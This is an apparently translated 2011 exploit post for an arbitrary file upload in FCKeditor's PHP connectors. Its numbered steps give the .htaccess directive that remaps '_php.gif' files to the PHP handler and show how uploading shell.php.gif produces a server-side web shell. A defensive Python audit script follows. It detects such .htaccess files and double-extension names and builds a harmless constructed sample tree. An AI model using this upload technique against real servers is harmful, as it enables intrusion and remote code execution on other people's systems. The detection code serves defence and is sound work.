FCKeditor all PHP versions upload vulnerability
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
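A defender-side audit for the two artefacts this technique leaves behind in an upload directory: a .htaccess that remaps a file pattern to the PHP handler, and a double-extension name that FCKeditor has rewritten to the "_php.gif" form. This is an added example, not code from the original post; the upload tree, the file names and the directive regexes are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Apache directives that can make a non-.php file name execute as PHP.
PHP_HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+\S*php", re.I | re.M)
# FCKeditor renames "x.php.gif" to "x_php.gif"; flag both the raw and renamed forms.
# Heuristic: a legitimate name such as "my_php.gif" also matches and needs review.
PHP_IN_NAME_RE = re.compile(r"[._](php\d?|phtml)\.", re.I)


def htaccess_sets_php_handler(text: str) -> bool:
    """True if an .htaccess body maps some file pattern to a PHP handler."""
    return PHP_HANDLER_RE.search(text) is not None


def suspicious_upload_name(name: str) -> bool:
    """True for double-extension names and FCKeditor's '_php.' rename remnant."""
    return PHP_IN_NAME_RE.search(name) is not None


def audit_upload_dir(root: Path) -> list[str]:
    """Walk an upload directory; return one finding string per suspicious file."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root)
        if p.name == ".htaccess":
            if htaccess_sets_php_handler(p.read_text(errors="ignore")):
                findings.append(f"{rel}: .htaccess remaps files to PHP handler")
            else:
                findings.append(f"{rel}: .htaccess present in upload dir")
        elif suspicious_upload_name(p.name):
            findings.append(f"{rel}: PHP extension hidden in file name")
    return findings


def demo() -> list[str]:
    """Build a constructed upload tree matching the advisory's steps and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".htaccess").write_text(
            '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
        (root / "shell_php.gif").write_bytes(b"GIF89a<?php echo 1; ?>")  # constructed sample
        (root / "photo.gif").write_bytes(b"GIF89a")  # benign upload
        return audit_upload_dir(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Running the audit on a real upload tree only requires calling audit_upload_dir() with that directory; pairing it with AllowOverride None on the upload location removes the handler-override path entirely.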